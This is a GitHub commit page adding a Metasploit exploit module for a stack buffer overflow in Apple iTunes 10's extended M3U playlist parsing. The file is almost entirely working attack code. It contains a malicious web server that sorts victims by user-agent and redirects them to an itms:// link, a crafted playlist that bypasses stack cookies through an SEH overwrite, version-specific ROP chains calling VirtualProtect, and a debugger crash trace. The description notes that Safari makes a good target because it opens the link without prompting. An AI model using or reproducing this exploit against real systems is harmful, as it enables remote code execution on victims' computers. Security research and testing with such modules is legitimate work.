-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add Apple iTunes 10 Extended M3U Stack Buffer Overflow
New exploit against Apple iTunes. Note that this appears to be different than liquidworm's CVE-2012-0677, because this one is a stack-based buffer overflow, while CVE-2012-0677 is heap-based, and a different crash/backtrace. However, according to Rh0, this bug is patched anyway in the same update... possibly a silent patch. As of now, there seems to be no CVE or OSVDB addressing this particular bug.
- Loading branch information
Showing
1 changed file
with
281 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,281 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/framework/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::Remote::HttpServer::HTML | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Apple iTunes 10 Extended M3U Stack Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. | ||
When opening an extended .m3u file containing an "#EXTINF:" tag description, | ||
iTunes will copy the content after "#EXTINF:" without appropriate checking | ||
from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary, | ||
which allows code execution under the context of the user. | ||
Please note before using this exploit, you must have precise knowledge of the | ||
victim machine's QuickTime version (if installed), and then select your target | ||
accordingly. | ||
In addition, even though this exploit can be used as remote, you should be aware | ||
the victim's browser behavior when opening an itms link. For example, | ||
IE/Firefox/Opera by default will ask the user for permission before launching the | ||
itms link by iTunes. Chrome will ask for permission, but also spits a warning. | ||
Safari would be an ideal target, because it will open the link without any | ||
user interaction. | ||
}, | ||
'Author' => | ||
[ | ||
'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module | ||
'sinn3r' #Mo' targets & code cleanup, etc | ||
], | ||
'DefaultOptions' => | ||
{ | ||
'EXITFUNC' => 'process', | ||
'InitialAutoRunScript' => 'migrate -f' | ||
}, | ||
'Platform' => ['win'], | ||
'Arch' => ARCH_X86, | ||
'Payload' => | ||
{ | ||
'Space' => 1000, | ||
'BadChars' => "\x00\x0a\x0d", | ||
'DisableNops' => true, | ||
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404 | ||
}, | ||
'References' => | ||
[ | ||
[ 'EDB', '19322' ] | ||
], | ||
'DisclosureDate' => "Jun 21 2012", | ||
'Targets' => | ||
[ | ||
# Default package for iTunesSetup104.exe | ||
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3', | ||
{ | ||
'Ret' => 0x669C197B, # ADD ESP,0xD40 / ret [QuickTime.qts] | ||
'ROP_NOP' => 0x66801044 # RET | ||
} | ||
], | ||
# Default package for iTunesSetup1041.exe | ||
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3', | ||
{ | ||
'Ret' => 0x6693A96B, # ADD ESP,0xD40 / ret [QuickTime.qts] | ||
'ROP_NOP' => 0x66801044 # RET | ||
} | ||
], | ||
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3', | ||
{ | ||
'Ret' => 0x6693ACBB, # ADD ESP,0xD40 / ret [QuickTime.qts] | ||
'ROP_NOP' => 0x66801044 # RET | ||
} | ||
], | ||
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3', | ||
{ | ||
'Ret' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts] | ||
'ROP_NOP' => 0x66801044 # RET | ||
} | ||
] | ||
] | ||
)) | ||
end | ||
|
||
|
||
def on_request_uri(cli,request) | ||
# re-generate the payload | ||
return if ((p = regenerate_payload(cli).encoded) == nil) | ||
|
||
host = request.headers['HOST'] | ||
agent = request.headers['USER-AGENT'] | ||
|
||
# iTunes browser link | ||
m3u_location = "itms://#{host}#{get_resource()}/#{rand_text_alphanumeric(8+rand(8))}.m3u" | ||
|
||
if request.uri =~ /\.ico$/i | ||
# Discard requests for ico files | ||
send_not_found(cli) | ||
elsif request.uri =~ /\.m3u$/i | ||
print_status("Target: #{target.name}") | ||
print_status("Sending playlist") | ||
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' }) | ||
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/ | ||
print_status("Redirecting to playlist") | ||
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' }) | ||
elsif agent =~ /NT 5\.1/ | ||
# redirect Firefox, Chrome, Opera, Safari to iTunes link | ||
print_status("Redirecting to playlist") | ||
send_redirect(cli, m3u_location) | ||
else | ||
print_status("Unknown User-Agent: #{agent}") | ||
send_not_found(cli) | ||
end | ||
end | ||
|
||
|
||
# IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header... | ||
# ... so use html | ||
def generate_redirect_ie(m3u_location) | ||
ie_redir = <<-HTML_REDIR | ||
<!DOCTYPE HTML> | ||
<html> | ||
<head> | ||
<meta http-equiv="refresh" content="0; URL=#{m3u_location}"> | ||
</head> | ||
</html> | ||
HTML_REDIR | ||
|
||
ie_redir = ie_redir.gsub(/^\t\t\t/, '') | ||
|
||
return ie_redir | ||
end | ||
|
||
|
||
def generate_m3u(payload) | ||
# Bypass stack cookies by triggering a SEH exception before | ||
# the cookie gets checked. SafeSEH is bypassed by using a non | ||
# safeSEH DLL [QuickTime.qts]. | ||
|
||
# stack buffer overflow -> | ||
# overwrite SEH handler -> | ||
# trigger SEH exception -> | ||
# rewind stack (ADD ESP, ...) and land in ROP NOP sled -> | ||
# virtualprotect and execute shellcode | ||
|
||
m3u = '#EXTINF:,' | ||
|
||
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ... | ||
# ... so ensure we overwrite a SEH handler to get back to our rop chain | ||
m3u << [target.ret].pack("V") * 0x6a # stack pivot/rewind | ||
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled | ||
m3u << gimme_rop | ||
m3u << payload | ||
|
||
# 0x1000 should be enough to overflow the stack and trigger SEH | ||
m3u << rand_text_alphanumeric(0x1000 - m3u.length) | ||
|
||
return m3u | ||
|
||
end | ||
|
||
|
||
def gimme_rop | ||
# thanx to mona.py :) | ||
rop_chain = [ | ||
:popad, | ||
# registers | ||
0x66801044, # EDI: RET | ||
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll] | ||
:jmpesp, | ||
junk, | ||
:ebx, # EBX: Becomes 0x3e8 | ||
0xffffffd6, # EDX: Becomes 0x40 | ||
0x673650b0, # ECX: lpflOldProtect | ||
0x90909090, #EAX | ||
# correct dwSize and flNewProtect | ||
:modebx, | ||
:addedx, | ||
# throw it on the stack | ||
:pushad | ||
] | ||
|
||
# Map gadgets to a specific Quicktime version | ||
rop_chain.map! { |g| | ||
case target.name | ||
when /QuickTime 7\.69/ | ||
case g | ||
when :popad then 0x66C3E260 | ||
when :jmpesp then 0x669F6E21 | ||
when :ebx then 0x4CC48017 | ||
when :modebx then 0x669A8648 # xor ebx,4CC483FF; ret | ||
when :addedx then 0x669FC1C6 # add edx, 0x6a; ret | ||
when :pushad then 0x6682A67E | ||
else | ||
g | ||
end | ||
|
||
when /QuickTime 7\.70/ | ||
case g | ||
when :popad then 0x66926F5B | ||
when :jmpesp then 0x66d6b743 | ||
when :ebx then 0x6c1703e8 | ||
when :modebx then 0x66b7d8cb # add ebx, 0x93E90000 ; ret | ||
when :addedx then 0x66975556 # add edx, 0x6a; ret | ||
when :pushad then 0x6689B829 | ||
else | ||
g | ||
end | ||
|
||
when /QuickTime 7\.71/ | ||
case g | ||
when :popad then 0x668E2BAA | ||
when :jmpesp then 0x66965F78 | ||
when :ebx then 0x6c1703e8 | ||
when :modebx then 0x66B7DC4B # add ebx, 0x93E90000 ; ret | ||
when :addedx then 0x66975956 # add edx, 0x6a; ret | ||
when :pushad then 0x66C28B70 | ||
else | ||
g | ||
end | ||
|
||
when /QuickTime 7\.72/ | ||
case g | ||
when :popad then 0x66c9a6c0 | ||
when :jmpesp then 0x6697aa03 | ||
when :ebx then 0x6c1703e8 | ||
when :modebx then 0x66b7de1b # add ebx, 0x93E90000 ; ret | ||
when :addedx then 0x66975c56 # add edx, 0x6a; ret | ||
when :pushad then 0x6684b5c6 | ||
else | ||
g | ||
end | ||
end | ||
} | ||
|
||
rop_chain.pack("V*") | ||
end | ||
|
||
|
||
def junk | ||
rand_text_alpha(4).unpack("L")[0].to_i | ||
end | ||
|
||
end | ||
|
||
=begin | ||
0:000> r | ||
eax=0e5eb6a0 ebx=00000000 ecx=00000183 edx=00000003 esi=0e5eb091 edi=00130000 | ||
eip=10ceaa7a esp=0012ee5c ebp=0012ee64 iopl=0 nv up ei pl nz na pe nc | ||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 | ||
iTunes_10000000!iTunesMainEntryPoint+0xb93f3a: | ||
10ceaa7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi] | ||
0:000> k | ||
ChildEBP RetAddr | ||
WARNING: Stack unwind information not available. Following frames may be wrong. | ||
0012ee64 10356284 iTunes_10000000!iTunesMainEntryPoint+0xb93f3a | ||
0012eea4 1035657c iTunes_10000000!iTunesMainEntryPoint+0x1ff744 | ||
0012eed8 1034de49 iTunes_10000000!iTunesMainEntryPoint+0x1ffa3c | ||
00000000 00000000 iTunes_10000000!iTunesMainEntryPoint+0x1f7309 | ||
0:000> !address esi | ||
0c720000 : 0d87d000 - 00ea3000 | ||
Type 00020000 MEM_PRIVATE | ||
Protect 00000004 PAGE_READWRITE | ||
State 00001000 MEM_COMMIT | ||
Usage RegionUsageHeap | ||
Handle 0c720000 | ||
0:000> !address edi-10 | ||
00030000 : 000ee000 - 00042000 | ||
Type 00020000 MEM_PRIVATE | ||
Protect 00000004 PAGE_READWRITE | ||
State 00001000 MEM_COMMIT | ||
Usage RegionUsageStack | ||
Pid.Tid d1c.d0c | ||
=end |